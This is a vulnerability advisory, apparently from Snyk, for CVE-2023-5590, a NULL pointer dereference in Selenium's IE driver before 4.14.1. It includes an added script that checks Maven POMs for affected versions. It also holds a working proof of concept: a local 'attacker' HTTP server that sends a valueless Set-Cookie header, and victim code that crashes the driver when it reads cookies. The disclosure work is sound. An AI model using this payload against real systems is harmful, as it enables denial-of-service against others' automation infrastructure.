NULL Pointer Dereference Affecting org.seleniumhq.selenium:selenium-ie-driver package, versions [,4.14.1)
- Snyk ID SNYK-JAVA-ORGSELENIUMHQSELENIUM-6062318
- published 16 Nov 2023
- disclosed 15 Oct 2023
- credit coolkingcole
Introduced: 15 Oct 2023
CVE-2023-5590
How to fix?
Upgrade org.seleniumhq.selenium:selenium-ie-driver to version 4.14.1 or higher.
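To check a Maven project against the affected range [,4.14.1), the following Python script is an added example, not part of the advisory or of Selenium. The sample POM is constructed, and the script assumes the version is declared directly or through a property in the same file; anything else is reported as "unknown" for manual review.

```python
import re
import xml.etree.ElementTree as ET

GROUP, ARTIFACT = "org.seleniumhq.selenium", "selenium-ie-driver"
FIXED = (4, 14, 1)  # first fixed version per the advisory

# Constructed sample POM (not from the advisory).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><selenium.version>4.13.0</selenium.version></properties>
  <dependencies><dependency>
    <groupId>org.seleniumhq.selenium</groupId>
    <artifactId>selenium-ie-driver</artifactId>
    <version>${selenium.version}</version>
  </dependency></dependencies>
</project>"""

def _local(tag):
    """Strip the XML namespace so POMs with and without xmlns both match."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None

def classify(version):
    """Return 'affected', 'fixed' or 'unknown' for one version string."""
    m = re.match(r"(\d+(?:\.\d+)*)(.*)", version)
    if not m:
        return "unknown"  # inherited, managed or unresolved version
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))  # treat '4.14' as 4.14.0
    if nums == FIXED and m.group(2):
        return "unknown"  # qualifier on the fixed version, e.g. -SNAPSHOT
    return "affected" if nums < FIXED else "fixed"

def find_affected(pom_xml):
    """Return (resolved_version, status) for each IE driver declaration."""
    root = ET.fromstring(pom_xml)
    props = {_local(p.tag): (p.text or "").strip() for e in root.iter()
             if _local(e.tag) == "properties" for p in e}
    findings = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency" or (
                _child_text(dep, "groupId"), _child_text(dep, "artifactId")) != (GROUP, ARTIFACT):
            continue
        raw = _child_text(dep, "version") or ""
        resolved = re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), raw)
        findings.append((resolved, classify(resolved)))
    return findings
```

Calling find_affected(SAMPLE_POM) reports the constructed 4.13.0 declaration as affected.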
Overview
Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check in the CookieWndProc function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.
PoC
Attacker Server Code
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta


class CustomHTTPRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Send response status code
        self.send_response(200)
        # Send headers
        self.send_header('Content-type', 'text/html')
        # Set the cookie expiration to one day in the future
        expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
        well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
        self.send_header('Set-Cookie', well_formed_cookie)
        # Second cookie carries only a name, with no '=value' part
        malicious_cookie = f"cookie_name2"  # crash
        self.send_header('Set-Cookie', malicious_cookie)
        self.end_headers()
        # Send message back to client
        message = "Hello world!"
        self.wfile.write(bytes(message, "utf8"))
        return


def run():
    print('Starting server...')
    server_address = ('127.0.0.1', 8090)
    httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
    print('Server is running...')
    httpd.serve_forever()


run()

Example Victim Code
from selenium import webdriver
import logging
import time

handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)

options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'

service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options, service=service)
driver.set_page_load_timeout(20)

print("Getting the page: ")
try:
    driver.get("http://127.0.0.1:8090/")
except Exception as e:
    print(e)
print("Got the page!")

print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()